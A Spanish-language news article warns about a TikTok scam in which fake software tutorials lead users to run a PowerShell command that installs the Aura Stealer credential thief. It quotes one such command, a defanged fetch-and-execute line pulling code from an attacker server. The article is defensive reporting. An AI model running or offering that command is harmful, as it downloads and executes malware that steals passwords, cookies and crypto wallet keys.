Alarma en Redes: Estafa Viral en TikTok Utiliza "Tutoriales" Falsos para Robar Contraseñas y Credenciales Bancarias

Videos que prometen acceso gratuito a software contienen comandos de PowerShell que instalan el malware "Aura Stealer", poniendo en riesgo datos sensibles de miles de usuarios.

WASHINGTON, EE. UU. – Una nueva y peligrosa campaña de ciberdelincuencia ha puesto en alerta a los expertos en seguridad digital. Los atacantes están utilizando la popular plataforma TikTok para distribuir malware que roba información personal y financiera, explotando la confianza generada por los videos tutoriales cortos y la inexperiencia técnica de algunos usuarios.

El fraude se basa en la ingeniería social: los ciberdelincuentes publican videos con la promesa de ofrecer accesos gratuitos a programas de pago como Windows, Photoshop o cuentas de servicios streaming. Para supuestamente obtener estos beneficios, piden a los usuarios copiar y ejecutar comandos aparentemente técnicos en la terminal de Windows (PowerShell).

El Comando "Secreto" que Instala un Ladrón de Credenciales

Lejos de ser una solución gratuita, el comando, a menudo con un formato críptico como iex (irm slmgr[.]win/photoshop), conecta el sistema del usuario a un servidor controlado por los atacantes. Investigadores del SANS Internet Storm Center (ISC) confirmaron que este proceso descarga y ejecuta al menos dos archivos maliciosos.

El principal es una variante del conocido malware Aura Stealer, diseñado para recolectar discretamente contraseñas almacenadas en navegadores, cookies de autenticación y claves de billeteras de criptomonedas. El segundo componente detectado tiene capacidad para compilar código dinámicamente, lo que podría usarse para establecer una persistencia avanzada en el sistema de la víctima y evadir la detección.

Ante la masividad de la amenaza, los especialistas hacen un llamado urgente a la precaución: cualquier video que prometa software gratuito a cambio de ejecutar comandos desconocidos debe ser tratado como una estafa. La principal recomendación para quienes hayan caído en el engaño es cambiar de inmediato todas las contraseñas y realizar un análisis profundo del equipo con un antivirus actualizado.